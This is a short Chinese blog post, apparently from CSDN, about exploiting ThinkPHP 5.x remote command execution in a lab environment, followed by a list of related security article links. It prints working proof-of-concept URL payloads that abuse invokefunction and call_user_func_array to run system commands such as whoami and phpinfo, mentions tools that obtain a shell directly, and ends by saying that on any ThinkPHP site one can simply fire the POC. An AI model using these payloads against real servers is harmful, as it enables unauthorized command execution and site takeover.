常见框架漏洞(Thinkphp)

Thinkphp5x远程命令执行及getshell

开启环境,访问靶场


可以用工具进行检测是否存在漏洞

存在漏洞可以直接用工具get shell

也可以手工操作

远程代码执行whoami
POC:
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/3f9cea23ca9c4ceda547abd9ef7acffd.png) ?s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 Thinkphp被曝很多漏洞,截至目前位置3x -- 6x的各个版本都被爆有大量漏洞,遇到TP的 站,直接打poc就可以了

相关推荐
逻极1 天前
Python MySQL防SQL注入实战:从字符串拼接的坑到参数化查询的救赎
python·mysql·安全·sql注入
Fnetlink11 天前
中小企业网络环境优化与安全建设
网络·安全·web安全
拍客圈1 天前
宝塔 安全风险 修复
安全
门思科技1 天前
企业级 LoRaWAN 网关远程运维方案对比:VPN 与 NPS FRP 的技术与安全差异分析
运维·网络·安全
文刀竹肃1 天前
DVWA -SQL Injection-通关教程-完结
前端·数据库·sql·安全·网络安全·oracle
Neolnfra1 天前
任意文件下载漏洞
计算机网络·安全·web安全·网络安全·系统安全·安全威胁分析·安全架构
tap.AI1 天前
AI时代的云安全(四)云环境中AI模型的安全生命周期管理实践
人工智能·安全
光影少年1 天前
web端安全问题有哪些?
前端·安全
测试人社区-千羽1 天前
AR/VR应用测试核心要点与实施策略
人工智能·安全·职场和发展·自动驾驶·测试用例·ar·vr